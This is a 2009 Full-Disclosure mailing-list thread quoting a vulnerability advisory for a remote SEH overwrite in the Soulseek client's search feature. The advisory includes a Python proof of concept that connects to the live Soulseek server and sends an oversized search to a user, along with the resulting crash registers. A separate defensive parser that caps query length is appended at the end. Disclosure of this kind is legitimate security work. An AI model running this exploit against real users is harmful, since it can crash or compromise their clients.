Seems like you have a problem with responsible disclosure, kid; do you have any family relationship with Jeremy Brown? ;P
http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments

2009/5/25 Pete Licoln <[email protected]>
> Oh so you have a blog ...
> http://g-laurent.blogspot.com/
>
> 2009/5/25 laurent gaffie <[email protected]>
>
>> =============================================
>> - Release date: May 24th, 2009
>> - Discovered by: Laurent Gaffié
>> - Severity: critical
>> =============================================
>>
>> I. VULNERABILITY
>> -------------------------
>> Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution
>>
>> II. BACKGROUND
>> -------------------------
>> "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
>> sharing application.
>> One of the things that makes Soulseek(tm) unique is our community and
>> community-related features.
>> Based on peer-to-peer technology, virtual rooms allow you to meet people
>> with the same interests, share information, and chat freely using
>> real-time messages in public or private.
>> Soulseek(tm), with its built-in people matching system, is a great way to
>> make new friends and expand your mind!"
>>
>> III. DESCRIPTION
>> -------------------------
>> The Soulseek client allows a distributed file search to one person, to
>> everyone, or in a specific Soulseek IRC channel, allowing a user to find
>> the files he wants in a dedicated channel, with his contacts, or on the
>> whole network.
>> Unfortunately this feature is vulnerable to a remote SEH overwrite, to a
>> specific user or even to a whole Soulseek IRC channel.
>>
>> IV. PROOF OF CONCEPT
>> -------------------------
>> This proof of concept is made to prevent a S-K party; it is only built to
>> target the user "testt4321".
>>
>> To try this proof of concept, you would have to open a Soulseek client and
>> use the username:
>> "testt4321"
>> with the password:
>> "12345678"
>> and launch this code.
>> If you want to change the username or target a whole channel, you would
>> have to reverse the binary protocol.
>>
>> #!/usr/bin/python
>> import struct
>> import sys, socket
>> from time import *
>>
>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>> s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch
>>
>> buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
>> buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
>> buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
>> buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
>> buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"
>>
>> s.send(buffer)
>> sleep(1)
>>
>> junk = "\x41" * 3084
>> next_seh = struct.pack('<L', 0x42424242)
>> seh = struct.pack('<L', 0x43434343)
>> other_junk = "\x61" * 1423
>>
>> buffer2 = "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
>> buffer2+= "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
>> s.send(buffer2)
>> sleep(1)
>> s.recv(1024)
>>
>> After the query is sent, the memory will look like this:
>> 0012FBE4 41414141
>> 0012FBE8 42424242 Pointer to next SEH record
>> 0012FBEC 43434343 SE handler
>> 0012FBF0 61616161
>>
>> And the program will terminate with this structure:
>> EAX 00000000
>> ECX 43434343
>> EDX 7C9132BC ntdll.7C9132BC
>> EBX 00000000
>> ESP 0012EA78
>> EBP 0012EA98
>> ESI 00000000
>> EDI 00000000
>> EIP 43434343
>>
>> V. BUSINESS IMPACT
>> -------------------------
>> An attacker could exploit this vulnerability to compromise any Soulseek
>> client connected to the Soulseek network.
>>
>> VI. SYSTEMS AFFECTED
>> -------------------------
>> Windows all versions running Soulseek *
>>
>> VII. SOLUTION
>> -------------------------
>> A fast solution would be to use Nicotine-Plus
>> (http://nicotine-plus.sourceforge.net/), a Python Soulseek client.
>> Another quick workaround (at server level) would be to limit the search
>> query length.
>>
>> VIII. REFERENCES
>> -------------------------
>> http://www.slsknet.org
>>
>> IX. CREDITS
>> -------------------------
>> This vulnerability has been discovered by Laurent Gaffié
>> Laurent.gaffie{remove-this}(at)gmail.com
>>
>> X. REVISION HISTORY
>> -------------------------
>> May 24, 2009: Initial release
>>
>> XI. DISCLOSURE TIMELINE
>> -------------------------
>> July 29, 2008: Bug discovered
>> September 03, 2008: Vendor contacted; no response.
>> October 14, 2008: Vendor contacted; still no response.
>> April 12, 2009: iDefense contacted.
>> April 13, 2009: iDefense answered.
>> April 23, 2009: Advisory sent to the iDefense contributor program.
>> May 13, 2009: iDefense contacted, bug rejected (no reason given).
>> May 15, 2009: iDefense recontacted; no answer.
>> May 16, 2009: Last try to contact Soulseek maintainers.
>> May 24, 2009: Advisory published.
>>
>> XII. LEGAL NOTICES
>> -------------------------
>> The information contained within this advisory is supplied "as-is"
>> with no warranties or guarantees of fitness of use or otherwise.
>> I accept no responsibility for any damage caused by the use or
>> misuse of this information.
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
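As an added example (not part of this thread, the advisory, or any Soulseek code), here is the server-side length check that the advisory's second workaround describes: a parser for the search message framing inferred from the bytes of the PoC's second packet (little-endian u32 message length, u32 code 0x2a, u32-prefixed username, u32 token, u32-prefixed query) that rejects a query longer than a cap, and also refuses length fields that disagree with the bytes actually received. The function names, the 256-byte cap and the field names are assumptions.

```python
import struct
# Assumed server-side cap on a search query (the advisory gives no number); 0x2A is the
# message code in the PoC's search packet, and the field layout is inferred from its bytes.
MAX_QUERY_LEN = 256
SEARCH_CODE = 0x2A

class MalformedMessage(ValueError):
    """Length fields on the wire do not agree with the bytes actually present."""

def read_u32(buf, off):
    if off + 4 > len(buf):
        raise MalformedMessage("truncated u32 at offset %d" % off)
    return struct.unpack_from("<I", buf, off)[0], off + 4

def read_str(buf, off, limit):
    """Read a u32-length-prefixed string, refusing a length above limit or past the buffer."""
    n, off = read_u32(buf, off)
    if n > limit:
        raise MalformedMessage("string length %d exceeds limit %d" % (n, limit))
    if off + n > len(buf):
        raise MalformedMessage("string of length %d runs past end of message" % n)
    return buf[off:off + n], off + n

def parse_search(data, max_query=MAX_QUERY_LEN):
    """Parse one framed search message; returns (fields, bytes left for the next message)."""
    length, off = read_u32(data, 0)
    if off + length > len(data):
        raise MalformedMessage("declared length %d exceeds %d available bytes" % (length, len(data) - off))
    msg, rest = data[off:off + length], data[off + length:]
    code, p = read_u32(msg, 0)
    if code != SEARCH_CODE:
        raise MalformedMessage("unexpected message code 0x%x" % code)
    user, p = read_str(msg, p, len(msg))    # username: bounded only by the message itself
    token, p = read_u32(msg, p)
    query, p = read_str(msg, p, max_query)  # the field the PoC oversizes
    if p != len(msg):
        raise MalformedMessage("%d trailing bytes inside message" % (len(msg) - p))
    return {"user": user.decode("latin-1"), "token": token, "query": query.decode("latin-1")}, rest

def build_search(user, token, query):
    """Encode a search message in the same framing (constructed test input, not live traffic)."""
    body = struct.pack("<I", SEARCH_CODE) + struct.pack("<I", len(user)) + user
    body += struct.pack("<I", token) + struct.pack("<I", len(query)) + query
    return struct.pack("<I", len(body)) + body

def accept_search(data, max_query=MAX_QUERY_LEN):
    """Gatekeeper: True only if the message parses cleanly within the query cap."""
    try:
        parse_search(data, max_query)
        return True
    except MalformedMessage:
        return False
```

A message whose query length field is 3816, as in the PoC, fails the cap check before any bytes of the query are copied; a message whose declared length exceeds the bytes actually received is refused rather than read past its end.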
